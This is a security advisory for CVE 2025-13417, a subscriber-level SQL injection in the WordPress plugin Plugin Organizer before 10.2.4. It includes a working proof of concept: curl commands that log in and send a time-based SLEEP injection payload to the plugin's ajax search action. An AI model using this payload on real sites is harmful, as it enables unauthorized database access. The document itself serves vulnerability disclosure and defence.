Plugin Organizer < 10.2.4 – Subscriber+ SQLi | CVE 2025-13417

Description

The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing subscribers to perform SQL injection attacks.

Proof of Concept

1) As an admin, go to https://example.com/wp-admin/admin.php?page=PO_global_plugins and click the second "Save" button on the page
2) Login as subscriber and save the cookies to a file:
```
curl -c cookies.txt \
-d "log=subscriber" \
-d "pwd=password" \
-d "wp-submit=Log+In" \
"http://wpscan-vulnerability-test-bench.ddev.site/wp-login.php"
```
3) Execute the SLEEP SQLi payload via PO_perform_plugin_search ajax action:
```
curl -b cookies.txt \
-d "action=PO_perform_plugin_search" \
-d "PO_plugin_path=a%' OR SLEEP(3) OR '1%'='1" \
"http://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php"
```
4) Payload will run twice, so sleep time will be double the payload (6 sec for SLEEP(3))